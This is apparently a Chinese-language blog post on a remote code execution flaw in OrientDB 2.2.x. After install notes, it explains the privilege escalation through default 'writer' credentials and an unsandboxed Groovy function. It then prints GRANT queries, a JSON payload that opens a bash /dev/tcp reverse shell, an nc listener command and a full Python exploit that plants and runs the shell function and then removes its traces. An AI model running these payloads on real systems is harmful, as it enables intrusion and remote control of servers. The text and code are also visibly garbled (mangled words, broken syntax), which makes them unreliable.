Oreint DB 远程代码执行漏洞

0×01 关于orIEnt db数据库

OrIEntDB是一个开源NoSQL数据库管理系统. NoSQL数据库提供了一种用于存储和检索引用除表式数据之外的数据(例如文档数据或图形数据)的NO关系或非关系数据的机制. NoSQL数据库越来越多地用于大数据和实时Web应用法式. Nosql系统有时也被称为“Not Only sql”,以强调它们可能支持类似sql的查询语言.

OrIEntDB也属于Nosql系列. OrIEntDB是第二代分布式数据库,具有灵活性的文档在一个产物与Apache 2许可证的开放源代码. 在OrIEntDB之前市场上有几个NoSQL数据库,其中一个是MongoDB.

0×01 orIEnt db 数据库的根基知识

步调1 – 下载OrIEntDB二进制设置文件

下载地址：@R_262_10107@://orIEntdb.com/download社区版和企业版都可以在任何实现Java虚拟机(JVM)的操作系统上运行. OrIEntDB必要1.7或更高版本的Java.

步调2 – 解压并安装orIEntDB

以下是为分歧操作系统提取和安装orIEntDB的过程.在linux中将orIEntdb-community-2.1.9.tar.gz文件解压,可以使用以下命令提取tarred文件.

$ tar –zxvf orIEntdb-community-2.1.9.tar.gz

使用以下敕令将所有OrIEntDB库文件从orIEntdbcommunity-2.1.9移动到/opt/orIEntdb/目录. 这里要用sudo

$ sudo mv orIEntdb-community-2.1.9 /opt/orIEntdb

使用以下敕令注册orIEntdb敕令和OrIEnt服务器.

$ export ORIENTDB_HoME = /opt/orIEntdb$ export PATH = $PATH:$ORIENTDB_HOME/bin

在windows中将orIEntdb-community-2.1.9.zip文件解压,将提取出的文件夹移动到C：\目录.使用以下给定值创立两个环境变量ORIENTDB_HOME和PATH变量.

ORIENT_HOME = C:orIEntdb-community-2.1.9 PATH = C:orIEntdb-community-2.1.9in

步调3 – 配置OrIEntDB服务器作为服务

这里就说下linux的~OrIEntDB提供了一个名为orIEntdb.sh的脚本文件,以作为守护程序运行数据库.在OrIEntDB安装目录的$ORIENTDB_HOME/bin/orIEntdb.sh的bin目录中可以找到它.在运行脚本文件之前,编纂orIEntdb.sh文件以定义两个变量.一个是ORIENTDB_DIR,它定义了安装目录/opt/orIEntdb的路径,第二个是ORIENTDB_USER,它定义了要运行OrIEntDB的用户名,如下所示.

ORIENTDB_DIR = "/opt/orIEntdb" ORIENTDB_USER = ""

使用以下命令将orIEntdb.sh文件复制到/etc/init.d/目录中以初始化和运行剧本.

$ sudo cp $ORIENTDB_HOME/bin/orIEntdb.sh /etc/init.d/orIEntdb

使用以下命令将console.sh文件从OrIEntDB安装目录$ ORIENTDB_HOME / bin复制到系统bin目录(即/ usr / bin)以拜访OrIEnt DB的控制台.

$ sudo cp $ ORIENTDB_HOME/bin/console.sh /usr/bin/orIEntdb

使用下面的命令来启动ORIENTDB数据库服务器作为服务.在这里,你必须提供你在orIEntdb.sh文件提及启动服务器的相应用户的暗码.$ service orIEntdb start使用以下命令知道哪个PID的OrIEntDB服务器守护程序正在运行.$ service orIEntdb status使用以下命令停止OrIEntDB服务器守护程序.$ service orIEntdb stop

0×02 漏洞阐发

1、OrIEntDB使用RBAC模型进行认证方案.默认情况下,OrIEntDB有3个角色：admin,writer and reader.它们的功能与与用户名称所饰演的角色相同.对于在服务器上创建的每个数据库,默认情况下会分配3个用户.

2、用户的权限分派如下：

admin : 拜访数据库上的所有功能,没有任何限制reader: 只读用户.读者可以查询数据库中的任何记录,但不能修改或删除它,也不能拜访内部信息,例如用户和角色本身的信息.writer: 与reader相同,但它也可以创建,更新和删除记录.

3、漏洞发生原理

管理员通过ORole结构处理用户以及他们角色,OrIEntDB必要oRole读取权限,以允许用户显示用户权限,并使与oRole权限相关联的其他查询.

从版本2.2.x及以上版本,只要oRole被查询,fetchplan和order by语句,则不必要此权限要求,并将信息返回给非特权用户.

由于OrIEnt db启用了这些功能 where、fetchplan、order by,导致了OrIEntDB具有一个可以执行常规的功能,并且这个groovy封装器没有沙箱进行保护导致了系统功能被拜访,导致我们可以运任何命令.

0×03 漏洞复现进程

1、首先先确定版本号,版本号切实其实定可由返回头确定

2、接着我们拜访 @R_262_10107@://Taarget:2480/ListDatabases 获取数据库名称,他会返回为一个Json列表

3、用writer的身份测验考试@R_262_10107@基础认证,看其是否对数据库可写.如果可写,那么则漏洞存在.

检测三部门的权限是否能得到提升：1)database.class.ouser

2)database.function

3)database.function

验证办法如下：

payload:@R_262_10107@://Target:2480/command/database_name/sql/-/20必修format=rID,type,version,class,graph

以POST的方式哀求如下数据：

GRANT execute ON database.class.ouser TO writer

GRANT execute ON database.function TO writer

GRANT execute ON database.systemclusters TO writer

如果胜利执行则可以利用.

上面给出exp：

{"@class":"ofunction","@version":0,"@rID":"#-1:-1","IDempotent":null,"name":"' + func_name + '","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/' + reverse_ip + '/6666 0>&1\';file file = new file(\"Hello.sh\");file.delete();file << (\"#!/bin/bash\n\");file << (command);def proc = \"bash Hello.sh\".execute();","parameters":null}

在目标用bash反弹,当地你可以用nc监听,运行如下命令：netcat -lp 6666

末了给出PoC:

#! /usr/bin/env python#-- Coding: utf-8 --# OrIEntDB <= 2.22 RCE PoCimport sysimport requestsimport Jsonimport Stringimport randomtarget = sys.argv[1]try: port = sys.argv[2] if sys.argv[2] else 2480except: port = 2480url = "@R_262_10107@://%s:%s/command/GratefulDeadConcerts/sql/-/20必修format=rID,graph"%(target,port)def random_Function_name(size=5,chars=String.asciilowercase + String.digits): return ''.join(random.choice(chars) for in range(sizE))def enum_databases(target,port="2480"): base_url = "@R_262_10107@://%s:%s/ListDatabases"%(target,port) req = requests.get(base_url) if req.status_code == 200: #print "[+] Database Enumeration successful" database = req.Json()['databases'] return database return falsedef check_version(target,port) req = requests.get(base_url) if req.status_code == 200: headers = req.headers['server'] #print headers if "2.2" in headers or "3." in headers: return True return falsedef run_querIEs(permission,db,content=""): databases = enum_databases(target) url = "@R_262_10107@://%s:%s/command/%s/sql/-/20必修format=rID,port,databases[0]) priv_enable = ["create","read","update","execute","delete"] #query = "GRANT create ON database.class.ouser TO writer" for priv in priv_enable: if permission == "GRANT": query = "GRANT %s ON %s TO writer"%(priv,db) else: query = "REVOKE %s ON %s FROM writer"%(priv,db) req = requests.post(url,data=query,auth=('writer','writer')) if req.status_code == 200: pass else: if priv == "execute": return True return false print "[+] %s"%(content) return Truedef priv_escalation(target,port="2480"): print "[+] checking OrIEntDB Database version is greater than 2.2" if check_version(target,port): priv1 = run_querIEs("GRANT","database.class.ouser","Privilege Escalation done checking enabling operations on database.function") priv2 = run_querIEs("GRANT","database.function","Enabled functional operations on database.function") priv3 = run_querIEs("GRANT","database.systemclusters","Enabling access to system clusters") if priv1 and priv2 and priv3: return True return falsedef exploit(target,port="2480"): #query = '"@class":"ofunction","name":"most","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';file file = new file(\"Hello.sh\");file.delete();file << (\"#!/bin/bash\n\");file << (command);def proc = \"bash Hello.sh\".execute(); ","parameters":null' #query = {"@class":"ofunction","IDempotent":None,"name":"ost","code":"def command = 'whoami';file file = new file(\"Hello.sh\");file.delete();file << (\"#!/bin/bash\n\");file << (command);def proc = \"bash Hello.sh\".execute(); ","parameters":NonE} func_name = random_Function_name() print func_name databases = enum_databases(target) reverse_ip = raw_input('enter the ip to connect BACk: ') query = '{"@class":"ofunction","name":"'+func_name+'","code":"def command = \'bash -i >& /dev/tcp/'+reverse_ip+'/8081 0>&1\';file file = new file(\"Hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash Hello.sh\".execute();","parameters":null}' #query = '{"@class":"ofunction","code":"def command = \'RR_192_11845@ /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f\' \u000a file file = new file(\"Hello.sh\")\u000a file.delete() \u000a file << (\"#!/bin/bash\")\u000a file << (command)\n def proc = \"bash Hello.sh\".execute() ","parameters":null}' #query = {"@class":"ofunction","name":"lllasd","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';file file = new file(\"Hello.sh\");file.delete();file << (\"#!/bin/bash\n\");file << (command);def proc = \"bash Hello.sh\".execute();","parameters":NonE} req = requests.post("@R_262_10107@://%s:%s/document/%s/-1:-1"%(target,databases[0]),'writer')) if req.status_code == 201: #print req.status_code #print req.Json() func_ID = req.Json()['@rID'].Strip("#") #print func_ID print "[+] Exploitation successful,get ready for your sHell.ExecuTing %s"%(func_Name) req = requests.post("@R_262_10107@://%s:%s/function/%s/%s"%(target,databases[0],func_Name),'writer')) #print req.status_code #print req.text if req.status_code == 200: print "[+] Open netcat at port 8081.." else: print "[+] Exploitation Failed at last step,try running the script again." print req.status_code print req.text #print "[+] deleting traces.." req = requests.delete("@R_262_10107@://%s:%s/document/%s/%s"%(target,func_ID),'writer')) priv1 = run_querIEs("REVOKE","Cleaning Up..database.class.ouser") priv2 = run_querIEs("REVOKE","Cleaning Up..database.function") priv3 = run_querIEs("REVOKE","Cleaning Up..database.systemclusters") #print req.status_code #print req.textdef main(): target = sys.argv[1] #port = sys.argv[1] if sys.argv[1] else 2480 try: port = sys.argv[2] if sys.argv[2] else 2480 #print port except: port = 2480 if priv_escalation(target,port): exploit(target,port) else: print "[+] Target not vulnerable"main()